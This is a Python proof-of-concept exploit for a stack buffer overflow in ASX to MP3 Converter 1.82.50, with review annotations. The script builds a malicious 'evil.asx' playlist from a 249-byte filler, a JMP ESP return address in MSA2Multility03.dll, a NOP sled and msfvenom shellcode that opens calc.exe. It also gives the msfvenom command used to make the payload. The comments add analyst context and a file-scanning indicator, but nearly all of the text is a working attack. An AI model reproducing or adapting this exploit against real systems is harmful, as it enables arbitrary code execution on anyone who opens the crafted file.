#!/usr/bin/python
# ASX to MP3 Converter 1.82.50 SOF exploit
# Software: https://www.exploit-db.com/apps/b7c8c2a232e1d4a959c43970a877a799-ASXtoMP3Converter.exe
# Date: 02 Oct 2022
# Reference:
# Author: Dylan Jenkins
# Based on PoC by the totally real person: Ivan Ivanovic Ivanov
# Reference: https://www.exploit-db.com/exploits/38382/
# Tested on: Windows 2k3
# EIP Offset: 249
# Bad Chars: \x00\x09\x0a\x1a
# Return Address | dll: 0x1003789d ("\xFF\xEF", JMP ESP) | MSA2Multility03.dll
# Usage: Open ASX to MP3 Converter application > load evil asx file > Opens calc.exe
#
# NOTE(review): the annotations below are for analysts reading this sample;
# they describe what the script writes and which conditions it depends on.
# - The return address is a fixed in-module address (header above), so the
#   technique presumably relies on that module loading at a constant base
#   (no ASLR) and on an executable stack (no DEP) — an inference, not
#   verified here. Both are standard platform hardening measures.
# - The script concatenates str and bytes values (see inputBuffer below);
#   together with the /usr/bin/python shebang this indicates Python 2
#   semantics, under which str and bytes are the same type.
# - Defensive indicator: the generated file "evil.asx" begins with a run of
#   249 'A' bytes followed by non-printable data; a long uniform printable
#   run in a playlist field is an anomaly that file scanners can flag.
import socket   # NOTE(review): unused in this script
import time     # NOTE(review): unused in this script
import sys
# 249 filler bytes — the "EIP Offset" given in the header.
filler = "A" * 249
# Little-endian byte form of the header's return address 0x1003789d.
eip = "\x9d\x78\x03\x10"
# NOTE(review): never used — not part of inputBuffer below.
offset = "C" * 4
# Ten NOP bytes placed between the return address and the shellcode.
nops = "\x90" * 10
# Code used to generate payload:
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0a\x1a" -f python -v shellcode
# Encoder output for the command above (launches calc.exe); the generator
# was told to avoid the bad characters listed in the header.
shellcode = b""
shellcode += b"\xdb\xda\xb8\x62\xaf\xe9\x67\xd9\x74\x24\xf4"
shellcode += b"\x5d\x33\xc9\xb1\x31\x83\xc5\x04\x31\x45\x14"
shellcode += b"\x03\x45\x76\x4d\x1c\x9b\x9e\x13\xdf\x64\x5e"
shellcode += b"\x74\x69\x81\x6f\xb4\x0d\xc1\xdf\x04\x45\x87"
shellcode += b"\xd3\xef\x0b\x3c\x60\x9d\x83\x33\xc1\x28\xf2"
shellcode += b"\x7a\xd2\x01\xc6\x1d\x50\x58\x1b\xfe\x69\x93"
shellcode += b"\x6e\xff\xae\xce\x83\xad\x67\x84\x36\x42\x0c"
shellcode += b"\xd0\x8a\xe9\x5e\xf4\x8a\x0e\x16\xf7\xbb\x80"
shellcode += b"\x2d\xae\x1b\x22\xe2\xda\x15\x3c\xe7\xe7\xec"
shellcode += b"\xb7\xd3\x9c\xee\x11\x2a\x5c\x5c\x5c\x83\xaf"
shellcode += b"\x9c\x98\x23\x50\xeb\xd0\x50\xed\xec\x26\x2b"
shellcode += b"\x29\x78\xbd\x8b\xba\xda\x19\x2a\x6e\xbc\xea"
shellcode += b"\x20\xdb\xca\xb5\x24\xda\x1f\xce\x50\x57\x9e"
shellcode += b"\x01\xd1\x23\x85\x85\xba\xf0\xa4\x9c\x66\x56"
shellcode += b"\xd8\xff\xc9\x07\x7c\x8b\xe7\x5c\x0d\xd6\x6d"
shellcode += b"\xa2\x83\x6c\xc3\xa4\x9b\x6e\x73\xcd\xaa\xe5"
shellcode += b"\x1c\x8a\x32\x2c\x59\x64\x79\x6d\xcb\xed\x24"
shellcode += b"\xe7\x4e\x70\xd7\xdd\x8c\x8d\x54\xd4\x6c\x6a"
shellcode += b"\x44\x9d\x69\x36\xc2\x4d\x03\x27\xa7\x71\xb0"
shellcode += b"\x48\xe2\x11\x57\xdb\x6e\xf8\xf2\x5b\x14\x04"
# Buffer Structure:
# AAAAA.AAAA + EIP + NOP...NOP + shellcode + BBB....BBB
# NOTE(review): the trailing BBB...BBB padding drawn above is not appended;
# the buffer actually ends with the shellcode.
inputBuffer = filler + eip + nops + shellcode
# Create buffer asx file and print to user
# NOTE(review): the output path is relative to the current working directory,
# so elevated rights are only needed if that directory is not writable;
# running a PoC as root/admin grants it more privilege than it requires.
print("\n .asx file buffer file creator, run as sudo/admin for file creation rights \n")
print("\nCreating evil asx file buffer to test control of EIP\n")
print("\ninput buffer is:\n")
print(inputBuffer)   # echoes the raw buffer, including non-printable bytes, to the terminal
print("\ncreatingfile: evil.asx\n")
f = open("evil.asx", "w")   # text mode, closed manually below rather than via a with-block
f.write(inputBuffer)
f.close()
print("\nclosing\n")
sys.exit()   # redundant: the script has no further statements